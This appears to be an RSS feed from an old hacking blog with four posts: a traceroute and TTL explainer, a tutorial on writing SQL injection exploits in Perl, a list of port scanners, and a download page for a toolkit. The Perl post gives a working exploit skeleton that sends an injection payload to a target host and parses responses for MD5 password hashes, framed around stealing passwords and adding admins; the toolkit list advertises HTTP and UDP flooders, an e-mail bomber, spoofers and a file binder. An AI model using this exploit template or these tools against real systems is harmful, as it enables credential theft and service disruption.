<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Hacking-Gurus &#187; ip address</title>
	<atom:link href="http://www.hacking-gurus.net/tag/ip-address/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.hacking-gurus.net</link>
	<description>Security Blog</description>
	<lastBuildDate>Mon, 26 Apr 2010 07:25:03 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=abc</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>TTL and Traceroute Explained</title>
		<link>http://www.hacking-gurus.net/2009/08/24/ttl-and-traceroute-explained/</link>
		<comments>http://www.hacking-gurus.net/2009/08/24/ttl-and-traceroute-explained/#comments</comments>
		<pubDate>Mon, 24 Aug 2009 15:58:51 +0000</pubDate>
		<dc:creator>r00t</dc:creator>
				<category><![CDATA[Linux]]></category>
		<category><![CDATA[Network Security]]></category>
		<category><![CDATA[Network Tools]]></category>
		<category><![CDATA[Tutorialz]]></category>
		<category><![CDATA[Act]]></category>
		<category><![CDATA[Bandwidth]]></category>
		<category><![CDATA[Control Message]]></category>
		<category><![CDATA[Good Reason]]></category>
		<category><![CDATA[hack]]></category>
		<category><![CDATA[Imagine]]></category>
		<category><![CDATA[Internet Control Message Protocol]]></category>
		<category><![CDATA[Internet Protocol Ip]]></category>
		<category><![CDATA[ip address]]></category>
		<category><![CDATA[Mail Server]]></category>
		<category><![CDATA[Network Administrator]]></category>
		<category><![CDATA[Router]]></category>
		<category><![CDATA[Simplicity]]></category>
		<category><![CDATA[Thing Of Beauty]]></category>
		<category><![CDATA[traceroute]]></category>
		<category><![CDATA[Ttl]]></category>
		<category><![CDATA[Van Jacobson]]></category>

		<guid isPermaLink="false">http://www.hacking-gurus.net/2009/08/24/ttl-and-traceroute-explained/</guid>
		<description><![CDATA[
		
		
		
		
Introduction     
Imagine a world without tracert/traceroute. You would be sending your precious packets out into the big wide world with no idea where they go and what they might meet when they are out there. When you set up routers with complex route statements you wouldn&#8217;t really know if everything you [...]]]></description>
			<content:encoded><![CDATA[<div style="float: right; width: 42px; padding-right: 10px; margin: 0 0 0 10px;">
		<script type="text/javascript">
		<!--
		digg_url = "http://www.hacking-gurus.net/2009/08/24/ttl-and-traceroute-explained/";
		digg_bgcolor = "#FFFFFF";
		digg_skin = "";
		digg_window = "new";
		digg_title = "TTL+and+Traceroute+Explained";
		digg_media = "news";
		digg_topic = "";
		digg_bodytext = "Introduction     Imagine a world without tracert/traceroute. You would be sending your precious packets out into the big wide world with no idea where they go and what they might meet when they are out there. When you set up routers with complex route statements you wouldn&#8217;t really know if everything you want is travelling the path you intend...";
		//-->
		</script>
		<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script></div><p><strong><u></u></strong></p>
<p><strong><u>Introduction </u></strong>    </p>
<p>Imagine a world without tracert/traceroute. You would be sending your precious packets out into the big wide world with no idea where they go and what they might meet when they are out there. When you set up routers with complex route statements you wouldn&#8217;t really know if everything you want is travelling the path you intend it to. When that pesky machine across the internet is &quot;hammering&quot; away at your mail server and you&#8217;d really like to know where it is you would be &quot;blind&quot;. Enter traceroute, the network administrator&#8217;s personal &quot;tracker&quot;.    <br />Traceroute was originally conceived as a hack by Van Jacobson in about 1988. He needed to find a way to delineate the path his packets were taking through a routed network to troubleshoot some problems. There were no tools available to do this and there was no clear and easy answer. With knowledge of how the network works Van created traceroute. The solution is elegant in it&#8217;s pure simplicity. It&#8217;s all in the TTL&#8230;..     <br />NOTE: My definition of a &quot;hack&quot; has always been that it is the use of the knowledge regarding how a system works to obtain results that the system was not intended to provide. As such I have always been extremely impressed by the pure simplicity of traceroute as a perfect example of a true &quot;hack&quot; of a system. It&#8217;s a little thing of beauty. </p>
<p><span id="more-131"></span></p>
<p><strong><u>What&#8217;s a TTL? </u></strong></p>
<p> <strong>
<p></p>
<p> The TTL, or Time To Live, is a field in the structure of an Internet Protocol, (IP), packet. Without a TTL a misrouted or mis-addressed packet sent out onto a network would forever travel cyberspace using up bandwidth for no good reason. The TTL is placed in the packets so that each router can check it and act accordingly. If a router that is not the destination of a packet receives one that has a TTL of 1 or 0 it must drop the packet, (not forward it onwards), and send an Internet Control Message Protocol, (ICMP), Time_Exceeded, (Type 11), packet to the originating IP address informing it that, to all intents and purposes, the destination IP address is &quot;too far away&quot; to be contacted. If a packet is received by a router that is not the destination of the packet then the router must decrement the TTL by one and forward the packet on to the next router, (or the destination IP address if that is the next &quot;hop&quot;). In this way control is maintained over messed up addresses or routes and the packets cannot wander forever.     <br />Van&#8217;s Hack.     <br />Knowing that the TTL is there for a reason and that a given response must occur if the number of hops required to reach the destination exceeds the TTL in the packet Van saw that this could be utilized to determine each router the packet passed through on it&#8217;s way to the destination address. This can be demonstrated manually and you can try this as you go if you like. Open a command/DOS prompt and type:-     <br />ping yahoo.com &lt;ENTER&gt;     <br /><strong></strong></strong>
<p><strong>The response will be:- </strong></p>
<p> <strong>
<p></p>
<p> Pinging yahoo.com [66.218.71.114] with 32 bytes of data:     <br />Reply from 216.109.127.30: bytes=32 time=40ms TTL=49     <br />Reply from 216.109.127.30: bytes=32 time=40ms TTL=49     <br />Reply from 216.109.127.30: bytes=32 time=40ms TTL=49     <br />Reply from 216.109.127.30: bytes=32 time=50ms TTL=49 </strong>
<p>Good, Yahoo is up&#8230;. But we have no idea how the packet got there. We can see that 32 bytes were sent, that it took an average of 42 milliseconds to get there and there&#8217;s that TTL thing set at 49. Knowing that most systems set the TTL at certain set points I can make a guess that the original TTL was 64 and, based on that assumption, I can guess that Yahoo is some 16 hops away from me&#8230;&#8230; But where? Try this:-     <br />Ping -i 1 yahoo.com &lt;ENTER&gt; </p>
<p>The -i switch allows you to set the TTL in the packet to anything you please between 1 and 255. Knowing that, we know that the first router should drop the packet if we set the TTL to 1 and send and ICMP Type 11 packet in return, (Time_Exceeded).     <br />The response will be:-     <br />Pinging yahoo.com [66.218.71.114] with 32 bytes of data:     <br />Reply from 207.XXX.XXX.1: TTL expired in transit.     <br />Reply from 207.XXX.XXX.1: TTL expired in transit.     <br />Reply from 207.XXX.XXX.1: TTL expired in transit.     <br />Reply from 207.XXX.XXX.1: TTL expired in transit.     <br />Well&#8230;. That&#8217;s the first router in the chain, (it&#8217;s actually my firewall. Your result will differ but it will be the first hop on the route to Yahoo from your computer). If we now set the TTL to 2 then the next router will send our Time_Exceeded packet back to us. Try:-     <br />ping -i 2 yahoo.com &lt;ENTER&gt;     <br />The response is:-     <br />Pinging yahoo.com [66.218.71.114] with 32 bytes of data:     <br />Reply from 207.XXX.XXX.17: TTL expired in transit.     <br />Reply from 207.XXX.XXX.17: TTL expired in transit.     <br />Reply from 207.XXX.XXX.17: TTL expired in transit.     <br />Reply from 207.XXX.XXX.17: TTL expired in transit.     <br />Nice&#8230; Thats my border router. Now I have two steps in the route. As long as I keep incrementing the TTL in the -i switch of the ping command I can manually tracert as far along the route to Yahoo as I get the Time_Exceeded responses from the routers. When you hit a firewall that will not respond to ping requests you will receive a &quot;Request timed out&quot; message. Usually this is the point you would give up, but it&#8217;s worth going another step or two because sometimes the firewall is set to not respond to pings themselves and not to allow them to the first internal router but they may allow them to the specific host you are trying to contact so it is worth going the extra mile.     <br />Am I restricted to ICMP Pings?     <br />Not at all. Just because your target has a firewall in place that stops pings doesn&#8217;t mean you can&#8217;t enumerate internal devices on the target network. Let&#8217;s say it&#8217;s a web server and the end of the traceroute looks like this:- (NOTE: It doesn&#8217;t for Yahoo and at this point do not continue to experiment with Yahoo or any other domain you don&#8217;t have rights or permission to do this against.)     <br />14 70 ms 70 ms 80 ms unknown.level3.net [64.152.69.30]     <br />15 70 ms 70 ms 80 ms unknown-66-218-82-226.yahoo.com [66.218.82.226]     <br />16 * * * Request timed out.     <br />17 * * * Request timed out.     <br />18 70 ms 70 ms 80 ms <a href="http://www.yahoo.com">www.yahoo.com</a> [66.218.71.114]     <br />We know that <a href="http://www.yahoo.com">www.yahoo.com</a> accepts HTTP requests on port 80 so we know that the firewall will let them in and we are really curious to see what those two &quot;Request timed out&quot; devices are. So you can fire up your favorite packet crafter, make up a packet that is a simple SYN request on port 80 to <a href="http://www.yahoo.com">www.yahoo.com</a> and set the TTL to 16 and send it out. With your trusty packet sniffer running you will receive the Time_Expired on your HTTP SYN packet. With some research as to the make-up of that packet you might be able to determine the operating system of the device, (Cisco IOS etc.). This works because even though HTTP is a TCP protocol the packets themselves are &quot;wrapped&quot; in the Internet Protocol, (IP), containing the TTL information and the required response to a packet that has &quot;run out of hops&quot; is the ICMP Time_Exceeded.     <br />Conclusion     <br />As you can see a very simple and innocuous looking part of a packet that has a simple function has been &quot;subverted&quot; into being a more powerful tool than it was ever intended. Today, every network administrator uses traceroute/tracert daily and most have no idea they are using a &quot;hacking tool&quot;. Others have taken Van&#8217;s original concept and improved upon it and found other ways to &quot;exploit&quot; the principle quite successfully but in my opinion his &quot;hack&quot; is still the most elegant.</p>
<img src="http://www.hacking-gurus.net/wp-content/plugins/pixelstats/trackingpixel.php?post_id=131&ts=1280469237" style="display:none;" alt="pixelstats trackingpixel"/>]]></content:encoded>
			<wfw:commentRss>http://www.hacking-gurus.net/2009/08/24/ttl-and-traceroute-explained/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Writing SQL Injection exploits in Perl</title>
		<link>http://www.hacking-gurus.net/2009/04/04/writing-sql-injection-exploits-in-perl/</link>
		<comments>http://www.hacking-gurus.net/2009/04/04/writing-sql-injection-exploits-in-perl/#comments</comments>
		<pubDate>Sat, 04 Apr 2009 18:30:22 +0000</pubDate>
		<dc:creator>r00t</dc:creator>
				<category><![CDATA[Database Security]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[Server Security]]></category>
		<category><![CDATA[Tutorialz]]></category>
		<category><![CDATA[database]]></category>
		<category><![CDATA[db]]></category>
		<category><![CDATA[explots]]></category>
		<category><![CDATA[hack]]></category>
		<category><![CDATA[hacked]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[ip]]></category>
		<category><![CDATA[ip address]]></category>
		<category><![CDATA[ipchain]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[MSSQL]]></category>
		<category><![CDATA[mysql]]></category>
		<category><![CDATA[network]]></category>
		<category><![CDATA[networking]]></category>
		<category><![CDATA[password]]></category>
		<category><![CDATA[perl]]></category>
		<category><![CDATA[perl exploits]]></category>
		<category><![CDATA[programming]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[sql injection]]></category>
		<category><![CDATA[unix]]></category>
		<category><![CDATA[web security]]></category>

		<guid isPermaLink="false">http://www.hacking-gurus.net/?p=62</guid>
		<description><![CDATA[
		
		
		
		[1] Introduction
[2] Little panning of Perl language used into an internet context
[3] Perl SQL Injection by examples
[4] Gr33tz to &#8230;

&#8212;+&#8212; StArT
[1] Introduction
Perl can be considered a very powerfull programming language in we think to the internet context. Infact we can make a lot
of operation across the internet just writing a litlle bit of code. So [...]]]></description>
			<content:encoded><![CDATA[<div style="float: right; width: 42px; padding-right: 10px; margin: 0 0 0 10px;">
		<script type="text/javascript">
		<!--
		digg_url = "http://www.hacking-gurus.net/2009/04/04/writing-sql-injection-exploits-in-perl/";
		digg_bgcolor = "#FFFFFF";
		digg_skin = "";
		digg_window = "new";
		digg_title = "Writing+SQL+Injection+exploits+in+Perl";
		digg_media = "news";
		digg_topic = "";
		digg_bodytext = " Introduction Little panning of Perl language used into an internet context Perl SQL Injection by examples Gr33tz to &#8230;&#8212;+&#8212; StArT IntroductionPerl can be considered a very powerfull programming language in we think to the internet context. Infact we can make a lotof operation across the internet just writing a litlle bit of code. So...";
		//-->
		</script>
		<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script></div><p>[1] Introduction<br />
[2] Little panning of Perl language used into an internet context<br />
[3] Perl SQL Injection by examples<br />
[4] Gr33tz to &#8230;</p>
<p><span id="more-62"></span></p>
<p>&#8212;+&#8212; StArT</p>
<p>[1] Introduction</p>
<p>Perl can be considered a very powerfull programming language in we think to the internet context. Infact we can make a lot<br />
of operation across the internet just writing a litlle bit of code. So i decided to write a similar guide to make an<br />
easiest life to everyone who decide to start writing a perl exploit.<br />
There are few requisites u need to proceed:<br />
- U must know the basics operation of perl (print, chomp, while, die, if, etc etc&#8230;);<br />
- U must know what kind of SQL code u need to inject to obtain a specific thing (stealing pwd, add new admin, etc etc&#8230;).</p>
<p>Now, we are ready to start&#8230;</p>
<p>[2] Little panning of Perl language used into an internet context</p>
<p>Using a Perl code into an internet context means that u should be able to make a sort of dialog between your script and the<br />
server side (or other..). To make this u need to use some &#8220;Perl modules&#8221;.<br />
Those modules must be put on the head of the script. In this tut we are going to use only the &#8220;IO::Socket&#8221; module, but<br />
there are thousand and if u are curious just search on cpan to retrieve info on every module.</p>
<p>[-] Using the IO::Socket module<br />
Using this module is quite simple. To make the Perl Interpreter able to use this module u must write on the starting<br />
of the script &#8220;use IO::Socket&#8221;. With this module u&#8217;ll be able to connect to every server defined previously, using<br />
a chomp, look at the example.</p>
<p>Example:<br />
print &#8220;Insert the host to connect: &#8220;;<br />
chomp ($host=&lt;STDIN&gt;);</p>
<p>Now suppose that the host inserted is www.host.com. We must declare to the interpreter that we want to connect to this<br />
host. To do this, we must create a new sock that will be used by the interpreter to connect.<br />
To create this we are going to write something like this:</p>
<p>$sock = IO::Socket::INET-&gt;new(Proto=&gt;&#8221;tcp&#8221;, PeerAddr=&gt;&#8221;$host&#8221;, PeerPort=&gt;&#8221;80&#8243;)<br />
or die &#8221; ]+[ Connecting ... Can't connect to host.nn";</p>
<p>In this piece of code we have declared that the interpreter must use the "IO::Socket" module, creating a new<br />
connection, through the TCP protocol, using the port 80 and direct to the host specified in the chomp<br />
($host=www.fbi.gov).<br />
If connection is not possible an error message will appear ("Connecting ... Can't connect to host").<br />
Resume:<br />
- Proto=&gt;TCP -------&gt; The protocol to use (TCP/UDP)<br />
- PeerAddr=&gt; -------&gt; The server/host to connect<br />
- PeerPort=&gt; -------&gt; Port to use for the connection</p>
<p>Ok, now let's go to the next step, which is the real hearth of this tut.</p>
<p>[3] Perl SQL Injection</p>
<p>Assuming that we know what kind of SQL statement must inject, now we are going to see how to do this.</p>
<p>The SQL code must be treaty like a normal variable (like &#8220;$injection&#8221;).</p>
<p>Example:<br />
$injection=index.php/forum?=[SQL_CODE]</p>
<p>This string means that we are going to inject the query into &#8220;index.php/forum&#8221; path, following the correct syntax that<br />
will bring us to cause a SQL Injection &#8220;?=&#8221;.</p>
<p>Now we must create a piece of code that will go to inject this query into the host vuln.</p>
<p>print $sock &#8220;GET $injection HTTP/1.1n&#8221;;<br />
print $sock &#8220;Accept: */*n&#8221;;<br />
print $sock &#8220;User-Agent: Hackern&#8221;;<br />
print $sock &#8220;Host: $hostn&#8221;;<br />
print $sock &#8220;Connection: closenn&#8221;;</p>
<p>This piece of code is the most important one into the building of an exploit.<br />
It can be considered the &#8220;validation&#8221; of the connection.<br />
In this case the &#8220;print&#8221; command doesn&#8217;t show anything on screen, but it creates a dialogue and sends commands to the host.</p>
<p>In the first line the script will send a &#8220;GET&#8221; to the selected page defined into &#8220;$injection&#8221;.<br />
In the third line it tells to the host &#8220;who/what&#8221; is making the request of &#8220;GET&#8221;. In this case this is Hacker, but it<br />
can be &#8220;Mozilla/5.0 Firefox/1.0.4&#8243; or other.<br />
In the fourth line it defines the host to connect to, &#8220;$host&#8221;.</p>
<p>With the execution of this script we have made our injection.</p>
<p>Resume of the exploit:</p>
<p>use IO::Socket</p>
<p>print &#8220;Insert the host to connect: &#8220;;<br />
chomp ($host=&lt;STDIN&gt;);</p>
<p>$sock = IO::Socket::INET-&gt;new(Proto=&gt;&#8221;tcp&#8221;, PeerAddr=&gt;&#8221;$host&#8221;, PeerPort=&gt;&#8221;80&#8243;)<br />
or die &#8221; ]+[ Connecting ... Can't connect to host.nn";</p>
<p>$injection=index.php/forum?=[SQL_CODE]</p>
<p>print $sock &#8220;GET $injection HTTP/1.1n&#8221;;<br />
print $sock &#8220;Accept: */*n&#8221;;<br />
print $sock &#8220;User-Agent: Hackern&#8221;;<br />
print $sock &#8220;Host: $hostn&#8221;;<br />
print $sock &#8220;Connection: closenn&#8221;;<br />
close ($sock); #this line terminates the connection</p>
<p>A little trick:</p>
<p>Assuming that, with the execution of SQL Inj, u want to retrieve a MD5 Hash PWD, u must be able to recognize it.<br />
Additionally, u want that your script will show the PWD on your screen.<br />
Well, to make this, the next piece of code, could be one of the possible solutions.</p>
<p>while($answer = &lt;$sock&gt;) {<br />
if ($answer =~ /([0-9a-f]{32})/) {<br />
print &#8220;]+[ Found! The hash is: $1n&#8221;;<br />
exit(); }</p>
<p>This string means that if the answer of the host will show a &#8220;word&#8221; made by 32 characters (&#8221;0&#8243; to &#8220;9&#8243; and &#8220;a&#8221; to &#8220;f&#8221;),<br />
this word must be considered the MD5 Hash PWD and it must be showed on screen.</p>
<p>Conclusions:<br />
The method showed in this tut is only one of the 10000 existing, but, for me, this is the most complete one.<br />
U could use also the module &#8220;LWP::Simple&#8221; in the place of &#8220;IO::Socket&#8221;, but u should change something into the code.<br />
This method can be used also, not only for SQL Injection, but, for example, remote file upload or other.</p>
<img src="http://www.hacking-gurus.net/wp-content/plugins/pixelstats/trackingpixel.php?post_id=62&ts=1280469237" style="display:none;" alt="pixelstats trackingpixel"/>]]></content:encoded>
			<wfw:commentRss>http://www.hacking-gurus.net/2009/04/04/writing-sql-injection-exploits-in-perl/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>Top 3 IP and Port Scanner</title>
		<link>http://www.hacking-gurus.net/2009/03/09/top-3-ip-and-port-scanner/</link>
		<comments>http://www.hacking-gurus.net/2009/03/09/top-3-ip-and-port-scanner/#comments</comments>
		<pubDate>Mon, 09 Mar 2009 03:38:02 +0000</pubDate>
		<dc:creator>r00t</dc:creator>
				<category><![CDATA[Network Security]]></category>
		<category><![CDATA[Network Tools]]></category>
		<category><![CDATA[angry ip scanner]]></category>
		<category><![CDATA[firewall]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[icmp tools]]></category>
		<category><![CDATA[ip]]></category>
		<category><![CDATA[ip address]]></category>
		<category><![CDATA[ip packets]]></category>
		<category><![CDATA[ipchain]]></category>
		<category><![CDATA[iptables]]></category>
		<category><![CDATA[Mac ip scanner]]></category>
		<category><![CDATA[namp]]></category>
		<category><![CDATA[network]]></category>
		<category><![CDATA[networking]]></category>
		<category><![CDATA[ping]]></category>
		<category><![CDATA[port scanner]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[superscan]]></category>
		<category><![CDATA[tcp ip]]></category>
		<category><![CDATA[TCP SYN]]></category>
		<category><![CDATA[traceroute]]></category>
		<category><![CDATA[windows ip scanner]]></category>

		<guid isPermaLink="false">http://www.hacking-gurus.net/?p=33</guid>
		<description><![CDATA[
		
		
		
		Port Scanner :
A port scanner is a piece of software designed to search a network host for open ports. This is often used by administrators to check the security of their networks and by crackers to compromise it. To portscan a host is to scan for listening ports on a single target host.

Nmap
Superscan
Angry Ip  [...]]]></description>
			<content:encoded><![CDATA[<div style="float: right; width: 42px; padding-right: 10px; margin: 0 0 0 10px;">
		<script type="text/javascript">
		<!--
		digg_url = "http://www.hacking-gurus.net/2009/03/09/top-3-ip-and-port-scanner/";
		digg_bgcolor = "#FFFFFF";
		digg_skin = "";
		digg_window = "new";
		digg_title = "Top+3+IP+and+Port+Scanner";
		digg_media = "news";
		digg_topic = "";
		digg_bodytext = "Port Scanner :A port scanner is a piece of software designed to search a network host for open ports. This is often used by administrators to check the security of their networks and by crackers to compromise it. To portscan a host is to scan for listening ports on a single target host.NmapSuperscanAngry Ip  Scanner1. NmapNmap (&#8221;Network Mapper&#8221;)...";
		//-->
		</script>
		<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script></div><p><strong>Port Scanner </strong>:</p>
<p>A <strong>port scanner</strong> is a piece of <span class="mw-redirect">software</span> designed to search a network host for open ports. This is often used by administrators to check the security of their networks and by <span class="mw-redirect">crackers</span> to compromise it. To <strong>portscan</strong> a host is to scan for listening ports on a single target host.<span id="more-33"></span></p>
<ol>
<li>Nmap</li>
<li>Superscan</li>
<li>Angry Ip  Scanner</li>
</ol>
<p>1. <strong>Nmap</strong></p>
<p><a name="intro">Nmap (&#8221;Network Mapper&#8221;) is a free and open source </a> utility for network exploration or security auditing.  Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics.  It was designed to rapidly scan large networks, but works fine against single hosts.  Nmap runs on all major computer operating systems, and both console and graphical versions are available.</p>
<p><a href="http://www.nmap.org" target="_blank">www.nmap.org</a></p>
<p>2. <strong>Superscan :</strong></p>
<p>SuperScan is a powerful freeware TCP port scanner, that includes a variety of additional networking tools like ping, traceroute, HTTP HEAD, WHOIS and more. It uses multi-threaded and asynchronous techniques resulting in extremely fast and versatile scanning. You can perform ping scans and port scans using any IP range or specify a text file to extract addresses from. Other features include TCP SYN scanning, UDP scanning, HTML reports, built-in port description database, Windows host enumeration, banner grabbing and more.</p>
<p><a href="http://www.foundstone.com/us/resources/proddesc/superscan.htm" target="_blank">www.foundstone.com/us/resources/proddesc/superscan.htm</a></p>
<p>3. <strong>Angry Ip  Scanner :</strong></p>
<p>Angry IP Scanner (or simply <em>ipscan</em>) is an open-source and cross-platform network scanner designed to be fast and simple to use. It scans IP addresses and ports as well as has many other features.</p>
<p>It is widely used by network administrators and just curious users around the world, including large and small enterprises, banks, and government agencies.</p>
<p>It runs on <em>Linux</em>, <em>Windows</em>, and <em>Mac OS X</em>, possibly supporting other platforms as well.</p>
<p><a href="http://www.angryziber.com/w/Home" target="_blank">www.angryziber.com/w/Home</a></p>
<img src="http://www.hacking-gurus.net/wp-content/plugins/pixelstats/trackingpixel.php?post_id=33&ts=1280469237" style="display:none;" alt="pixelstats trackingpixel"/>]]></content:encoded>
			<wfw:commentRss>http://www.hacking-gurus.net/2009/03/09/top-3-ip-and-port-scanner/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>Net Tools</title>
		<link>http://www.hacking-gurus.net/2009/03/08/net-tools/</link>
		<comments>http://www.hacking-gurus.net/2009/03/08/net-tools/#comments</comments>
		<pubDate>Sun, 08 Mar 2009 13:50:09 +0000</pubDate>
		<dc:creator>r00t</dc:creator>
				<category><![CDATA[Network Security]]></category>
		<category><![CDATA[Network Tools]]></category>
		<category><![CDATA[Wireless Security]]></category>
		<category><![CDATA[Anonymous]]></category>
		<category><![CDATA[cpu]]></category>
		<category><![CDATA[dhcp]]></category>
		<category><![CDATA[dns]]></category>
		<category><![CDATA[DOS]]></category>
		<category><![CDATA[email bomber]]></category>
		<category><![CDATA[Encryption]]></category>
		<category><![CDATA[flooder]]></category>
		<category><![CDATA[ftp]]></category>
		<category><![CDATA[http]]></category>
		<category><![CDATA[ip]]></category>
		<category><![CDATA[ip address]]></category>
		<category><![CDATA[monitoring]]></category>
		<category><![CDATA[net meter]]></category>
		<category><![CDATA[netstat]]></category>
		<category><![CDATA[network]]></category>
		<category><![CDATA[networking]]></category>
		<category><![CDATA[nmap]]></category>
		<category><![CDATA[ping]]></category>
		<category><![CDATA[port scanner]]></category>
		<category><![CDATA[sniffer]]></category>
		<category><![CDATA[SNMP]]></category>
		<category><![CDATA[spoofer]]></category>
		<category><![CDATA[tracert]]></category>
		<category><![CDATA[trojan]]></category>
		<category><![CDATA[trojan hunter]]></category>
		<category><![CDATA[whois]]></category>

		<guid isPermaLink="false">http://www.hacking-gurus.net/?p=25</guid>
		<description><![CDATA[
		
		
		
		What is Net Tools :
Net Tools is a comprehensive set of host monitoring, network scanning, security, administration tools and much more, all with a highly intuitive user interface. It&#8217;s an ideal tool for those who work in the network security, administration, training, internet forensics or law enforcement internet crimes fields. Net Tools is mainly written [...]]]></description>
			<content:encoded><![CDATA[<div style="float: right; width: 42px; padding-right: 10px; margin: 0 0 0 10px;">
		<script type="text/javascript">
		<!--
		digg_url = "http://www.hacking-gurus.net/2009/03/08/net-tools/";
		digg_bgcolor = "#FFFFFF";
		digg_skin = "";
		digg_window = "new";
		digg_title = "Net+Tools";
		digg_media = "news";
		digg_topic = "";
		digg_bodytext = "What is Net Tools :Net Tools is a comprehensive set of host monitoring, network scanning, security, administration tools and much more, all with a highly intuitive user interface. It&#8217;s an ideal tool for those who work in the network security, administration, training, internet forensics or law enforcement internet crimes fields. Net Tools is mainly...";
		//-->
		</script>
		<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script></div><p><strong>What is Net Tools :</strong></p>
<p>Net Tools is a comprehensive set of host monitoring, network scanning, security, administration tools and much more, all with a highly intuitive user interface. It&#8217;s an ideal tool for those who work in the network security, administration, training, internet forensics or law enforcement internet crimes fields. Net Tools is mainly written in Microsoft Visual Basic 6, Visual C++, Visual C# and Visual Studio .NET.</p>
<p><span id="more-25"></span></p>
<p><strong>Screenshots</strong></p>
<p>Here are a few screenshots of Net Tools 5.                                    Click to enlarge.</p>
<p><a rel="lightbox" href="http://users.telenet.be/ahmadi/ntscreenshot1.JPG" target="_blank"><img src="http://users.telenet.be/ahmadi/ntSH1.jpg" border="0" alt="Screenshot #1 - click to enlarge" width="75" height="75" /></a> <a rel="lightbox" href="http://users.telenet.be/ahmadi/ntscreenshot2.JPG" target="_blank"><img src="http://users.telenet.be/ahmadi/ntSH2.jpg" border="0" alt="Screenshot #2 - click to enlarge" width="75" height="75" /></a> <a rel="lightbox" href="http://users.telenet.be/ahmadi/ntscreenshot3.JPG" target="_blank"><img src="http://users.telenet.be/ahmadi/ntSH3.jpg" border="0" alt="Screenshot #3 - click to enlarge" width="75" height="75" /></a></p>
<p><a rel="lightbox" href="http://users.telenet.be/ahmadi/ntscreenshot4.JPG" target="_blank"><img src="http://users.telenet.be/ahmadi/ntSH4.jpg" border="0" alt="Screenshot #4 - click to enlarge" width="75" height="75" /></a> <a rel="lightbox" href="http://users.telenet.be/ahmadi/ntscreenshot5.JPG" target="_blank"><img src="http://users.telenet.be/ahmadi/ntSH5.jpg" border="0" alt="Screenshot #5 - click to enlarge" width="75" height="75" /></a> <a rel="lightbox" href="http://users.telenet.be/ahmadi/ntscreenshot6.JPG" target="_blank"><img src="http://users.telenet.be/ahmadi/ntSH6.jpg" border="0" alt="Screenshot #6 - click to enlarge" width="75" height="75" /></a></p>
<p><a rel="lightbox" href="http://users.telenet.be/ahmadi/ntscreenshot7.JPG" target="_blank"><img src="http://users.telenet.be/ahmadi/ntSH7.jpg" border="0" alt="Screenshot #7 - click to enlarge" width="75" height="75" /></a> <a rel="lightbox" href="http://users.telenet.be/ahmadi/ntscreenshot8.JPG" target="_blank"><img src="http://users.telenet.be/ahmadi/ntSH8.jpg" border="0" alt="Screenshot #8 - click to enlarge" width="75" height="75" /></a> <a rel="lightbox" href="http://users.telenet.be/ahmadi/ntscreenshot9.JPG" target="_blank"><img src="http://users.telenet.be/ahmadi/ntSH9.jpg" border="0" alt="Screenshot #9 - click to enlarge" width="75" height="75" /></a></p>
<p><strong>Download Net Tools 5.0</strong></p>
<p><strong>[ <a href="http://www.mabsoft.com/NetTools5.0.70.zip">download</a> ] </strong><span class="style3">(version 5.0.70)</span></p>
<p><strong>Features</strong>:</p>
<p>Net Tools 5.0 (build 70) contains a whole variety of network tools. Here is a list of the most important tools:</p>
<p style="margin-bottom: 0pt;">1) IP Address Scanner<br />
2) IP Calculator<br />
3) IP Converter<br />
4) Port Listener<br />
5) Port Scanner<br />
6) Ping<br />
7) NetStat (2 ways)<br />
8 ) Trace Route (2 ways)<br />
9) TCP/IP Configuration<br />
10) Online &#8211; Offline Checker<br />
11) Resolve Host &amp; IP<br />
12) Time Sync<br />
13) Whois &amp; MX Lookup<br />
14) Connect0r<br />
15) Connection Analysator and protector<br />
16) Net Sender<br />
17) E-mail seeker<br />
18) Net Pager<br />
19) Active and Passive port scanner<br />
20) Spoofer<br />
21) Hack Trapper<br />
22) HTTP flooder (DoS)<br />
23) Mass Website Visiter<br />
24) Advanced Port Scanner<br />
25) Trojan Hunter (Multi IP)<br />
26) Port Connecter Tool<br />
27) Advanced Spoofer<br />
28) Advanced Anonymous E-mailer<br />
29) Simple Anonymous E-mailer<br />
30) Anonymous E-mailer with Attachment Support<br />
31) Mass E-mailer<br />
32) E-mail Bomber<br />
33) E-mail Spoofer<br />
34) Simple Port Scanner (fast)<br />
35) Advanced Netstat Monitoring<br />
36) X Pinger<br />
37) Web Page Scanner<br />
38) Fast Port Scanner<br />
39) Deep Port Scanner<br />
40) Fastest Host Scanner (UDP)<br />
41) Get Header<br />
42) Open Port Scanner<br />
43) Multi Port Scanner<br />
44) HTTP scanner (Open port 80 subnet scanner)<br />
45) Multi Ping for Cisco Routers<br />
46) TCP Packet Sniffer<br />
47) UDP flooder<br />
48) Resolve and Ping<br />
49) Multi IP ping<br />
50) File Dependency Sniffer<br />
51) EXE-joiner (bind 2 files)<br />
52) Encrypter<br />
53) Advanced Encryption<br />
54) File Difference Engine<br />
55) File Comparasion<br />
56) Mass File Renamer<br />
